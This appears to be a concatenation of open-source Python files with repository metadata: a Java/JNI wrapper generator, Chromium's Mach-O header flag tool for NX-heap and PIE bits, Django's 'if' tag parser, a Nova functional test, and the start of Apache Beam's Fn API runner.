instruct_fields = [(pname, ptype, arr, "") for (pname, ptype, arr) in params if pname != "void"] helper = JavaStructEmitHelper(self, name, instruct_fields) helper.config_struct_get = lambda o: "0" # "pointer" type to use for JN/JNI jtype_ptr = java_types_map[("long", None)] jfielddefs_private = [] for fname, ftype, arr, comment in helper.fields: # print(fname, ftype, arr) is_outparam = (fname in outparams) is_nullok = (fname in nullokparams) and not is_outparam if is_outparam: if ftype[-1] == '*': ftype = ftype[:-1] elif arr is None: raise ValueError("outparam %s is not a pointer or array", fname) field = helper.get_field_java_code(fname, ftype, arr, 0, jfielddefs_private, backing="%s_buf" % fname) paramtypes[fname] = (ftype, arr, field["type"]) if is_outparam: jn_funcargs.append((fname, jtype_ptr)) jni_funcargs.append((fname, jtype_ptr)) continue write_bufs = field["write_bufs"] write = field["write"] jtype = field["type"] arr = field["arr"] is_pointer = field["is_pointer"] to_arg = field["to_arg"] # input parameter generation if fname not in size_params: j_funcargs.append((fname, jtype)) # for JN/JNI, force all pointer/arrays to simple "long" type if ftype[-1] == '*' or jtype.string_array: jn_funcargs.append((fname, jtype_ptr)) jni_funcargs.append((fname, jtype_ptr)) else: jn_funcargs.append((fname, jtype)) jni_funcargs.append((fname, jtype)) # determine what to pass and how (e.g. jinit code) if jtype.jni_sig == "[Ljava/lang/String;": raise NotImplementedError("string array") elif jtype.jni_sig[0] == '[': if arr: raise NotImplementedError("sized array") else: jinit.append("{size_jtype} {size_fname} = {fname}.length;".format( size_jtype=field["size_jtype"].j_type, size_fname=field["size_fname"], fname=fname)) jinit.extend("%s = null;" % x for x in write_bufs) jinit.extend(write) jn_passedargs[fname] = to_arg elif jtype.is_enum: jn_passedargs[fname] = to_arg elif jtype.is_opaque: if is_nullok: to_arg = "%s == null ? 
0 : %s" % (fname, to_arg) jn_passedargs[fname] = to_arg elif jtype.is_struct: if is_nullok: to_arg = "%s == null ? 0 : %s" % (fname, to_arg) jn_passedargs[fname] = to_arg elif jtype.jni_sig[0] in java_accessor_map: jn_passedargs[fname] = fname elif jtype.jni_sig == "Ljava/lang/String;": if jtype.string_array: jinit.append( "ByteBuffer {fname}_buf = ByteBuffer.allocateDirect({array_size}).order(ByteOrder.nativeOrder());".format( fname=fname, array_size=256)) jinit.extend(field["backing_write"]) jn_passedargs[ fname] = "{fname} == null ? 0 : getByteBufferAddress({fname}_buf)".format( fname=fname) else: jinit.extend("%s = null;" % x for x in write_bufs) jinit.extend(write) jn_passedargs[fname] = to_arg else: raise ValueError("unrecognized jni signature '%s'" % jtype.jni_sig) jrettype = rettype.j_type outstruct_name = None # print(name, jrettype, outparams, retarraysize, retsize) if outparams or retarraysize or retsize: # create a return structure outstruct_fields = [] outstruct_size = [] for (pname, ptype, arr) in params: if pname not in outparams: continue if ptype[-1] == '*': ptype = ptype[:-1] outstruct_fields.append((pname, ptype, arr, "")) if arr: if ptype == "char": outstruct_size.append(arr) else: raise NotImplementedError("non-char array") else: outstruct_size.append("8") outstruct_sized_members = {} outstruct_name = name[4:] + "Result" # create a return buffer (TODO: optimize size) jinit.append( "ByteBuffer rv_buf = ByteBuffer.allocateDirect(%s).order(ByteOrder.nativeOrder());" % "+".join( outstruct_size)) jinit.append("long rv_addr = getByteBufferAddress(rv_buf);") jconstruct_args = [("rv_buf", "ByteBuffer")] jconstruct = [] if retarraysize: jconstruct_args.append(("jn_rv", "long")) jconstruct.append("array_addr = jn_rv;") if retarraysize: outstruct_fields.append(("array", restype, "", "")) outstruct_sized_members["array"] = retarraysize elif functype != "STDFUNC": outstruct_fields.append(("val", restype, None, "")) helper = JavaStructEmitHelper(self, 
outstruct_name, outstruct_fields, sized_members=outstruct_sized_members) helper.config_struct_get = lambda o: "0" jfielddefs = [] jfielddefs_private = [] off = 0 for fname, ftype, arr, comment in helper.fields: field = helper.get_field_java_code(fname, ftype, arr, off, jfielddefs_private, backing="rv_buf") if fname == retarraysize: jconstruct.append( field["fielddef"].replace("public ", "").replace(fname, "array_%s" % fname)) jconstruct.extend( x.replace(fname, "array_%s" % fname) for x in field["backing_read"]) jn_passedargs[fname] = "rv_addr+%d" % off off += 8 continue jfielddefs.append(field["fielddef"]) if fname == "array": # jconstruct.extend(field["backing_read"]) jconstruct.extend(field["read"]) elif fname != "val": jn_passedargs[fname] = "rv_addr+%d" % off off += 8 jconstruct.extend(field["construct"]) jconstruct.extend(field["backing_read"]) jconstruct.extend(field["read"]) if retarraysize: jfielddefs.append("private long array_addr;") # optimize len(outparams) == 1 case to directly return it. 
if len(outparams) == 1 and not retarraysize and rettype.j_type == "void": jfini.extend(x.replace("public ", "") for x in jfielddefs) jfini.extend(jconstruct) jretc = "return %s;" % outparams[0] jrettype = paramtypes[outparams[0]][2].j_type # rettype = paramtypes[outparams[0]][2] elif len(outparams) == 1 and retsize: jfini.extend(x.replace("public ", "") for x in jfielddefs) jfini.extend(jconstruct) jfini.append("val = new {type}(jn_rv, {owned}, {size});".format(type=rettype.j_type, owned="true" if retowned else "false", size=retsize)) jretc = "return val;" else: defined.add(outstruct_name) jfini.append("{struct_name} rv = new {struct_name}({args});".format( struct_name=outstruct_name, args=", ".join(x[0] for x in jconstruct_args))) if retsize: jfini.append("rv.val = new {type}(jn_rv, {owned}, rv.{size});".format( type=rettype.j_type, owned="true" if retowned else "false", size=retsize)) elif not retarraysize and functype != "STDFUNC": jfini.append("rv.val = new {type}(jn_rv, {owned});".format(type=rettype.j_type, owned="true" if retowned else "false")) jrettype = outstruct_name if retarraysize: rettype = c_to_jtype(outstruct_name, None) # else: # rettype = java_types_map[("void", None)] print(""" public static class {struct_name} {{ {jfielddefs} private {struct_name}({jconstruct_args}) {{ {jconstruct} }}""".format(struct_name=outstruct_name, jfielddefs="\n ".join(jfielddefs), jconstruct_args=", ".join("%s %s" % (x[1], x[0]) for x in jconstruct_args), jconstruct="\n ".join(jconstruct)), file=self.out) if retarraysize: print(""" @Override protected void finalize() throws Throwable {{ imaqDispose(array_addr); super.finalize(); }} }}""".format(struct_name=outstruct_name), file=self.out) else: print(" }", file=self.out) jretc = "return rv;" elif functype != "STDFUNC": if rettype.is_enum: jretc = "return {type}.fromValue(jn_rv);".format(type=rettype.j_type) elif rettype.is_struct or rettype.is_opaque: jretc = "return new {type}(jn_rv, 
{owned});".format(type=rettype.j_type, owned="true" if retowned else "false") else: jretc = "return jn_rv;" # # Java function # # assert name.startswith("imaq") # name = name[4].lower() + name[5:] print(""" public static {rettype} {name}({args}) {{ {init} {rv}_{name}({passedargs}); {fini}{retcode} }}""".format(rettype=jrettype, name=name, args=", ".join("%s %s" % (x[1].j_type, x[0]) for x in j_funcargs), init="\n ".join(jinit), fini="\n ".join(jfini), rv="%s jn_rv = " % rettype.jn_type if rettype.jn_type != "void" else "", retcode="\n " + jretc if jretc else "", passedargs=", ".join( jn_passedargs[x[0]] if x[0] in jn_passedargs else "UNKNOWN" for x in jn_funcargs)), file=self.out) # # Native Java function # print(""" private static native {rettype} _{name}({args});""".format( rettype=rettype.jn_type, name=name, args=", ".join("%s %s" % (x[1].jn_type, x[0]) for x in jn_funcargs)), file=self.out) # # C function # print(""" /* J: {jrettype} {name}({jargs}) * JN: {jnrettype} {name}({jnargs}) * C: {restype} {name}({cparams}) */""".format(name=name, jrettype=rettype.j_type, jargs=", ".join("%s %s" % (x[1].j_type, x[0]) for x in j_funcargs), jnrettype=rettype.jn_type, jnargs=", ".join("%s %s" % (x[1].jn_type, x[0]) for x in jn_funcargs), restype=restype, cparams=", ".join("%s %s" % (ptype, pname) for pname, ptype, arr in params)), file=self.outc) cargs = [] for pname, ptype, arr in params: if pname == "void": continue if ptype in structs: cargs.append("*((%s*)%s)" % (ptype, pname)) elif ptype.endswith("String255"): cargs.append("(char *)%s" % pname) elif arr: cargs.append("(%s*)%s" % (ptype, pname)) else: cargs.append("(%s)%s" % (ptype, pname)) callcfunc = "{restype} rv = {name}({args});".format(name=name, restype=restype, args=", ".join(cargs)) print(""" JNIEXPORT {rettype} JNICALL Java_{package}_{classname}__1{name}({args}) {{ {callfunc} {exceptioncheck}{retcode} }}""".format(rettype=rettype.jni_type, package=self.package.replace(".", "_"), classname=self.classname, 
name=name.replace("_", "_1"), args=", ".join("%s %s" % (x[1].jni_type, x[0]) for x in jni_funcargs), callfunc=callcfunc, exceptioncheck=exceptioncheck, retcode="\n return (%s)rv;" % rettype.jni_type if rettype.jni_type != "void" else ""), file=self.outc) defined.add(name) def struct(self, name, fields): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return defined.add(name) helper = JavaStructEmitHelper(self, name, fields) print(helper.get_java_code(), file=self.out) def union(self, name, fields): self.unions[name] = fields def generate(srcdir, outdir, inputs): emit = None for fname, config_struct_path, configpath, funcs_path in inputs: # read config files config_struct = configparser.ConfigParser() config_struct.read(config_struct_path) config = configparser.ConfigParser() config.read(configpath) block_comment_exclude = set(x.strip() for x in config.get("Block Comment", "exclude").splitlines()) library_funcs = set() with open(funcs_path) as ff: for line in ff: library_funcs.add(line.strip()) # open input file with codecs.open(fname, encoding="utf-8", errors="ignore") as inf: # prescan for undefined structures prescan_file(inf) inf.seek(0) if emit is None: emit = JavaEmitter(outdir, config, config_struct, library_funcs) else: emit.config = config emit.config_struct = config_struct emit.library_funcs = library_funcs # generate parse_file(emit, inf, block_comment_exclude) emit.finish() if __name__ == "__main__": if len(sys.argv) < 5 or ((len(sys.argv) - 1) % 4) != 0: print("Usage: gen_wrap.py <header.h config_struct.ini config.ini funcs.txt>...") exit(0) inputs = [] for i in range(1, len(sys.argv), 4): fname = sys.argv[i] config_struct_name = sys.argv[i + 1] configname = sys.argv[i + 2] funcs_name = sys.argv[i + 3] inputs.append((fname, config_struct_name, configname, funcs_name)) generate("", "", inputs)
bsd-3-clause
XiaosongWei/chromium-crosswalk
build/mac/change_mach_o_flags.py
232
10318
#!/usr/bin/env python # Copyright (c) 2011 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Usage: change_mach_o_flags.py [--executable-heap] [--no-pie] <executablepath> Arranges for the executable at |executable_path| to have its data (heap) pages protected to prevent execution on Mac OS X 10.7 ("Lion"), and to have the PIE (position independent executable) bit set to enable ASLR (address space layout randomization). With --executable-heap or --no-pie, the respective bits are cleared instead of set, making the heap executable or disabling PIE/ASLR. This script is able to operate on thin (single-architecture) Mach-O files and fat (universal, multi-architecture) files. When operating on fat files, it will set or clear the bits for each architecture contained therein. NON-EXECUTABLE HEAP Traditionally in Mac OS X, 32-bit processes did not have data pages set to prohibit execution. Although user programs could call mprotect and mach_vm_protect to deny execution of code in data pages, the kernel would silently ignore such requests without updating the page tables, and the hardware would happily execute code on such pages. 64-bit processes were always given proper hardware protection of data pages. This behavior was controllable on a system-wide level via the vm.allow_data_exec sysctl, which is set by default to 1. The bit with value 1 (set by default) allows code execution on data pages for 32-bit processes, and the bit with value 2 (clear by default) does the same for 64-bit processes. In Mac OS X 10.7, executables can "opt in" to having hardware protection against code execution on data pages applied. This is done by setting a new bit in the |flags| field of an executable's |mach_header|. When MH_NO_HEAP_EXECUTION is set, proper protections will be applied, regardless of the setting of vm.allow_data_exec. 
See xnu-1699.22.73/osfmk/vm/vm_map.c override_nx and xnu-1699.22.73/bsd/kern/mach_loader.c load_machfile. The Apple toolchain has been revised to set the MH_NO_HEAP_EXECUTION when producing executables, provided that -allow_heap_execute is not specified at link time. Only linkers shipping with Xcode 4.0 and later (ld64-123.2 and later) have this ability. See ld64-123.2.1/src/ld/Options.cpp Options::reconfigureDefaults() and ld64-123.2.1/src/ld/HeaderAndLoadCommands.hpp HeaderAndLoadCommandsAtom<A>::flags(). This script sets the MH_NO_HEAP_EXECUTION bit on Mach-O executables. It is intended for use with executables produced by a linker that predates Apple's modifications to set this bit itself. It is also useful for setting this bit for non-i386 executables, including x86_64 executables. Apple's linker only sets it for 32-bit i386 executables, presumably under the assumption that the value of vm.allow_data_exec is set in stone. However, if someone were to change vm.allow_data_exec to 2 or 3, 64-bit x86_64 executables would run without hardware protection against code execution on data pages. This script can set the bit for x86_64 executables, guaranteeing that they run with appropriate protection even when vm.allow_data_exec has been tampered with. POSITION-INDEPENDENT EXECUTABLES/ADDRESS SPACE LAYOUT RANDOMIZATION This script sets or clears the MH_PIE bit in an executable's Mach-O header, enabling or disabling position independence on Mac OS X 10.5 and later. Processes running position-independent executables have varying levels of ASLR protection depending on the OS release. The main executable's load address, shared library load addresess, and the heap and stack base addresses may be randomized. Position-independent executables are produced by supplying the -pie flag to the linker (or defeated by supplying -no_pie). Executables linked with a deployment target of 10.7 or higher have PIE on by default. 
This script is never strictly needed during the build to enable PIE, as all linkers used are recent enough to support -pie. However, it's used to disable the PIE bit as needed on already-linked executables. """ import optparse import os import struct import sys # <mach-o/fat.h> FAT_MAGIC = 0xcafebabe FAT_CIGAM = 0xbebafeca # <mach-o/loader.h> MH_MAGIC = 0xfeedface MH_CIGAM = 0xcefaedfe MH_MAGIC_64 = 0xfeedfacf MH_CIGAM_64 = 0xcffaedfe MH_EXECUTE = 0x2 MH_PIE = 0x00200000 MH_NO_HEAP_EXECUTION = 0x01000000 class MachOError(Exception): """A class for exceptions thrown by this module.""" pass def CheckedSeek(file, offset): """Seeks the file-like object at |file| to offset |offset| and raises a MachOError if anything funny happens.""" file.seek(offset, os.SEEK_SET) new_offset = file.tell() if new_offset != offset: raise MachOError, \ 'seek: expected offset %d, observed %d' % (offset, new_offset) def CheckedRead(file, count): """Reads |count| bytes from the file-like |file| object, raising a MachOError if any other number of bytes is read.""" bytes = file.read(count) if len(bytes) != count: raise MachOError, \ 'read: expected length %d, observed %d' % (count, len(bytes)) return bytes def ReadUInt32(file, endian): """Reads an unsinged 32-bit integer from the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module), and returns it as a number. Raises a MachOError if the proper length of data can't be read from |file|.""" bytes = CheckedRead(file, 4) (uint32,) = struct.unpack(endian + 'I', bytes) return uint32 def ReadMachHeader(file, endian): """Reads an entire |mach_header| structure (<mach-o/loader.h>) from the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module), and returns a 7-tuple of its members as numbers. 
Raises a MachOError if the proper length of data can't be read from |file|.""" bytes = CheckedRead(file, 28) magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = \ struct.unpack(endian + '7I', bytes) return magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags def ReadFatArch(file): """Reads an entire |fat_arch| structure (<mach-o/fat.h>) from the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module), and returns a 5-tuple of its members as numbers. Raises a MachOError if the proper length of data can't be read from |file|.""" bytes = CheckedRead(file, 20) cputype, cpusubtype, offset, size, align = struct.unpack('>5I', bytes) return cputype, cpusubtype, offset, size, align def WriteUInt32(file, uint32, endian): """Writes |uint32| as an unsinged 32-bit integer to the file-like |file| object, treating it as having endianness specified by |endian| (per the |struct| module).""" bytes = struct.pack(endian + 'I', uint32) assert len(bytes) == 4 file.write(bytes) def HandleMachOFile(file, options, offset=0): """Seeks the file-like |file| object to |offset|, reads its |mach_header|, and rewrites the header's |flags| field if appropriate. The header's endianness is detected. Both 32-bit and 64-bit Mach-O headers are supported (mach_header and mach_header_64). Raises MachOError if used on a header that does not have a known magic number or is not of type MH_EXECUTE. The MH_PIE and MH_NO_HEAP_EXECUTION bits are set or cleared in the |flags| field according to |options| and written to |file| if any changes need to be made. 
If already set or clear as specified by |options|, nothing is written.""" CheckedSeek(file, offset) magic = ReadUInt32(file, '<') if magic == MH_MAGIC or magic == MH_MAGIC_64: endian = '<' elif magic == MH_CIGAM or magic == MH_CIGAM_64: endian = '>' else: raise MachOError, \ 'Mach-O file at offset %d has illusion of magic' % offset CheckedSeek(file, offset) magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = \ ReadMachHeader(file, endian) assert magic == MH_MAGIC or magic == MH_MAGIC_64 if filetype != MH_EXECUTE: raise MachOError, \ 'Mach-O file at offset %d is type 0x%x, expected MH_EXECUTE' % \ (offset, filetype) original_flags = flags if options.no_heap_execution: flags |= MH_NO_HEAP_EXECUTION else: flags &= ~MH_NO_HEAP_EXECUTION if options.pie: flags |= MH_PIE else: flags &= ~MH_PIE if flags != original_flags: CheckedSeek(file, offset + 24) WriteUInt32(file, flags, endian) def HandleFatFile(file, options, fat_offset=0): """Seeks the file-like |file| object to |offset| and loops over its |fat_header| entries, calling HandleMachOFile for each.""" CheckedSeek(file, fat_offset) magic = ReadUInt32(file, '>') assert magic == FAT_MAGIC nfat_arch = ReadUInt32(file, '>') for index in xrange(0, nfat_arch): cputype, cpusubtype, offset, size, align = ReadFatArch(file) assert size >= 28 # HandleMachOFile will seek around. Come back here after calling it, in # case it sought. 
fat_arch_offset = file.tell() HandleMachOFile(file, options, offset) CheckedSeek(file, fat_arch_offset) def main(me, args): parser = optparse.OptionParser('%prog [options] <executable_path>') parser.add_option('--executable-heap', action='store_false', dest='no_heap_execution', default=True, help='Clear the MH_NO_HEAP_EXECUTION bit') parser.add_option('--no-pie', action='store_false', dest='pie', default=True, help='Clear the MH_PIE bit') (options, loose_args) = parser.parse_args(args) if len(loose_args) != 1: parser.print_usage() return 1 executable_path = loose_args[0] executable_file = open(executable_path, 'rb+') magic = ReadUInt32(executable_file, '<') if magic == FAT_CIGAM: # Check FAT_CIGAM and not FAT_MAGIC because the read was little-endian. HandleFatFile(executable_file, options) elif magic == MH_MAGIC or magic == MH_CIGAM or \ magic == MH_MAGIC_64 or magic == MH_CIGAM_64: HandleMachOFile(executable_file, options) else: raise MachOError, '%s is not a Mach-O or fat file' % executable_file executable_file.close() return 0 if __name__ == '__main__': sys.exit(main(sys.argv[0], sys.argv[1:]))
bsd-3-clause
tmpgit/intellij-community
python/lib/Lib/site-packages/django/template/smartif.py
331
6261
""" Parser and utilities for the smart 'if' tag """ import operator # Using a simple top down parser, as described here: # http://effbot.org/zone/simple-top-down-parsing.htm. # 'led' = left denotation # 'nud' = null denotation # 'bp' = binding power (left = lbp, right = rbp) class TokenBase(object): """ Base class for operators and literals, mainly for debugging and for throwing syntax errors. """ id = None # node/token type name value = None # used by literals first = second = None # used by tree nodes def nud(self, parser): # Null denotation - called in prefix context raise parser.error_class( "Not expecting '%s' in this position in if tag." % self.id ) def led(self, left, parser): # Left denotation - called in infix context raise parser.error_class( "Not expecting '%s' as infix operator in if tag." % self.id ) def display(self): """ Returns what to display in error messages for this node """ return self.id def __repr__(self): out = [str(x) for x in [self.id, self.first, self.second] if x is not None] return "(" + " ".join(out) + ")" def infix(bp, func): """ Creates an infix operator, given a binding power and a function that evaluates the node """ class Operator(TokenBase): lbp = bp def led(self, left, parser): self.first = left self.second = parser.expression(bp) return self def eval(self, context): try: return func(context, self.first, self.second) except Exception: # Templates shouldn't throw exceptions when rendering. We are # most likely to get exceptions for things like {% if foo in bar # %} where 'bar' does not support 'in', so default to False return False return Operator def prefix(bp, func): """ Creates a prefix operator, given a binding power and a function that evaluates the node. 
""" class Operator(TokenBase): lbp = bp def nud(self, parser): self.first = parser.expression(bp) self.second = None return self def eval(self, context): try: return func(context, self.first) except Exception: return False return Operator # Operator precedence follows Python. # NB - we can get slightly more accurate syntax error messages by not using the # same object for '==' and '='. # We defer variable evaluation to the lambda to ensure that terms are # lazily evaluated using Python's boolean parsing logic. OPERATORS = { 'or': infix(6, lambda context, x, y: x.eval(context) or y.eval(context)), 'and': infix(7, lambda context, x, y: x.eval(context) and y.eval(context)), 'not': prefix(8, lambda context, x: not x.eval(context)), 'in': infix(9, lambda context, x, y: x.eval(context) in y.eval(context)), 'not in': infix(9, lambda context, x, y: x.eval(context) not in y.eval(context)), '=': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)), '==': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)), '!=': infix(10, lambda context, x, y: x.eval(context) != y.eval(context)), '>': infix(10, lambda context, x, y: x.eval(context) > y.eval(context)), '>=': infix(10, lambda context, x, y: x.eval(context) >= y.eval(context)), '<': infix(10, lambda context, x, y: x.eval(context) < y.eval(context)), '<=': infix(10, lambda context, x, y: x.eval(context) <= y.eval(context)), } # Assign 'id' to each: for key, op in OPERATORS.items(): op.id = key class Literal(TokenBase): """ A basic self-resolvable object similar to a Django template variable. """ # IfParser uses Literal in create_var, but TemplateIfParser overrides # create_var so that a proper implementation that actually resolves # variables, filters etc is used. 
id = "literal" lbp = 0 def __init__(self, value): self.value = value def display(self): return repr(self.value) def nud(self, parser): return self def eval(self, context): return self.value def __repr__(self): return "(%s %r)" % (self.id, self.value) class EndToken(TokenBase): lbp = 0 def nud(self, parser): raise parser.error_class("Unexpected end of expression in if tag.") EndToken = EndToken() class IfParser(object): error_class = ValueError def __init__(self, tokens): # pre-pass necessary to turn 'not','in' into single token l = len(tokens) mapped_tokens = [] i = 0 while i < l: token = tokens[i] if token == "not" and i + 1 < l and tokens[i+1] == "in": token = "not in" i += 1 # skip 'in' mapped_tokens.append(self.translate_token(token)) i += 1 self.tokens = mapped_tokens self.pos = 0 self.current_token = self.next() def translate_token(self, token): try: op = OPERATORS[token] except (KeyError, TypeError): return self.create_var(token) else: return op() def next(self): if self.pos >= len(self.tokens): return EndToken else: retval = self.tokens[self.pos] self.pos += 1 return retval def parse(self): retval = self.expression() # Check that we have exhausted all the tokens if self.current_token is not EndToken: raise self.error_class("Unused '%s' at end of if expression." % self.current_token.display()) return retval def expression(self, rbp=0): t = self.current_token self.current_token = self.next() left = t.nud(self) while rbp < self.current_token.lbp: t = self.current_token self.current_token = self.next() left = t.led(left, self) return left def create_var(self, value): return Literal(value)
apache-2.0
tealover/nova
nova/tests/functional/v3/test_extended_volumes.py
24
4504
# Copyright 2012 Nebula, Inc. # Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from nova.compute import api as compute_api from nova import db from nova.tests.functional.v3 import test_servers from nova.tests.unit.api.openstack import fakes from nova.tests.unit import fake_block_device from nova.tests.unit import fake_instance CONF = cfg.CONF CONF.import_opt('osapi_compute_extension', 'nova.api.openstack.compute.extensions') class ExtendedVolumesSampleJsonTests(test_servers.ServersSampleBase): extension_name = "os-extended-volumes" extra_extensions_to_load = ["os-access-ips"] # TODO(park): Overriding '_api_version' till all functional tests # are merged between v2 and v2.1. After that base class variable # itself can be changed to 'v2' _api_version = 'v2' def _get_flags(self): f = super(ExtendedVolumesSampleJsonTests, self)._get_flags() f['osapi_compute_extension'] = CONF.osapi_compute_extension[:] f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.extended_volumes.' 'Extended_volumes') f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.keypairs.' 'Keypairs') f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.extended_ips_mac.' 'Extended_ips_mac') f['osapi_compute_extension'].append( 'nova.api.openstack.compute.contrib.extended_ips.' 
'Extended_ips') return f def _stub_compute_api_get_instance_bdms(self, server_id): def fake_bdms_get_all_by_instance(context, instance_uuid, use_slave=False): bdms = [ fake_block_device.FakeDbBlockDeviceDict( {'id': 1, 'volume_id': 'a26887c6-c47b-4654-abb5-dfadf7d3f803', 'instance_uuid': server_id, 'source_type': 'volume', 'destination_type': 'volume', 'device_name': '/dev/sdd'}), fake_block_device.FakeDbBlockDeviceDict( {'id': 2, 'volume_id': 'a26887c6-c47b-4654-abb5-dfadf7d3f804', 'instance_uuid': server_id, 'source_type': 'volume', 'destination_type': 'volume', 'device_name': '/dev/sdc'}) ] return bdms self.stubs.Set(db, 'block_device_mapping_get_all_by_instance', fake_bdms_get_all_by_instance) def _stub_compute_api_get(self): def fake_compute_api_get(self, context, instance_id, **kwargs): want_objects = kwargs.get('want_objects') if want_objects: return fake_instance.fake_instance_obj( context, **{'uuid': instance_id}) else: return {'uuid': instance_id} self.stubs.Set(compute_api.API, 'get', fake_compute_api_get) def test_show(self): uuid = self._post_server() self.stubs.Set(db, 'block_device_mapping_get_all_by_instance', fakes.stub_bdm_get_all_by_instance) response = self._do_get('servers/%s' % uuid) subs = self._get_regexes() subs['hostid'] = '[a-f0-9]+' subs['access_ip_v4'] = '1.2.3.4' subs['access_ip_v6'] = '80fe::' self._verify_response('server-get-resp', subs, response, 200) def test_detail(self): uuid = self._post_server() self.stubs.Set(db, 'block_device_mapping_get_all_by_instance', fakes.stub_bdm_get_all_by_instance) response = self._do_get('servers/detail') subs = self._get_regexes() subs['id'] = uuid subs['hostid'] = '[a-f0-9]+' subs['access_ip_v4'] = '1.2.3.4' subs['access_ip_v6'] = '80fe::' self._verify_response('servers-detail-resp', subs, response, 200)
apache-2.0
dhalperi/incubator-beam
sdks/python/apache_beam/runners/portability/fn_api_runner.py
2
17798
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """A PipelineRunner using the SDK harness. """ import collections import json import logging import Queue as queue import threading import grpc from concurrent import futures import apache_beam as beam from apache_beam.coders import WindowedValueCoder from apache_beam.coders.coder_impl import create_InputStream from apache_beam.coders.coder_impl import create_OutputStream from apache_beam.internal import pickler from apache_beam.io import iobase from apache_beam.transforms.window import GlobalWindows from apache_beam.runners.api import beam_fn_api_pb2 from apache_beam.runners.portability import maptask_executor_runner from apache_beam.runners.worker import data_plane from apache_beam.runners.worker import operation_specs from apache_beam.runners.worker import sdk_worker # This module is experimental. No backwards-compatibility guarantees. 
def streaming_rpc_handler(cls, method_name): """Un-inverts the flow of control between the runner and the sdk harness.""" class StreamingRpcHandler(cls): _DONE = object() def __init__(self): self._push_queue = queue.Queue() self._pull_queue = queue.Queue() setattr(self, method_name, self.run) self._read_thread = threading.Thread(target=self._read) def run(self, iterator, context): self._inputs = iterator # Note: We only support one client for now. self._read_thread.start() while True: to_push = self._push_queue.get() if to_push is self._DONE: return yield to_push def _read(self): for data in self._inputs: self._pull_queue.put(data) def push(self, item): self._push_queue.put(item) def pull(self, timeout=None): return self._pull_queue.get(timeout=timeout) def empty(self): return self._pull_queue.empty() def done(self): self.push(self._DONE) self._read_thread.join() return StreamingRpcHandler() class OldeSourceSplittableDoFn(beam.DoFn): """A DoFn that reads and emits an entire source. """ # TODO(robertwb): Make this a full SDF with progress splitting, etc. def process(self, source): if isinstance(source, iobase.SourceBundle): for value in source.source.read(source.source.get_range_tracker( source.start_position, source.stop_position)): yield value else: # Dataflow native source with source.reader() as reader: for value in reader: yield value # See DataflowRunner._pardo_fn_data OLDE_SOURCE_SPLITTABLE_DOFN_DATA = pickler.dumps( (OldeSourceSplittableDoFn(), (), {}, [], beam.transforms.core.Windowing(GlobalWindows()))) class FnApiRunner(maptask_executor_runner.MapTaskExecutorRunner): def __init__(self): super(FnApiRunner, self).__init__() self._last_uid = -1 def has_metrics_support(self): return False def _next_uid(self): self._last_uid += 1 return str(self._last_uid) def _map_task_registration(self, map_task, state_handler, data_operation_spec): input_data = {} runner_sinks = {} transforms = [] transform_index_to_id = {} # Maps coders to new coder objects and references. 
coders = {} def coder_id(coder): if coder not in coders: coders[coder] = beam_fn_api_pb2.Coder( function_spec=sdk_worker.pack_function_spec_data( json.dumps(coder.as_cloud_object()), sdk_worker.PYTHON_CODER_URN, id=self._next_uid())) return coders[coder].function_spec.id def output_tags(op): return getattr(op, 'output_tags', ['out']) def as_target(op_input): input_op_index, input_output_index = op_input input_op = map_task[input_op_index][1] return { 'ignored_input_tag': beam_fn_api_pb2.Target.List(target=[ beam_fn_api_pb2.Target( primitive_transform_reference=transform_index_to_id[ input_op_index], name=output_tags(input_op)[input_output_index]) ]) } def outputs(op): return { tag: beam_fn_api_pb2.PCollection(coder_reference=coder_id(coder)) for tag, coder in zip(output_tags(op), op.output_coders) } for op_ix, (stage_name, operation) in enumerate(map_task): transform_id = transform_index_to_id[op_ix] = self._next_uid() if isinstance(operation, operation_specs.WorkerInMemoryWrite): # Write this data back to the runner. fn = beam_fn_api_pb2.FunctionSpec(urn=sdk_worker.DATA_OUTPUT_URN, id=self._next_uid()) if data_operation_spec: fn.data.Pack(data_operation_spec) inputs = as_target(operation.input) side_inputs = {} runner_sinks[(transform_id, 'out')] = operation elif isinstance(operation, operation_specs.WorkerRead): # A Read is either translated to a direct injection of windowed values # into the sdk worker, or an injection of the source object into the # sdk worker as data followed by an SDF that reads that source. 
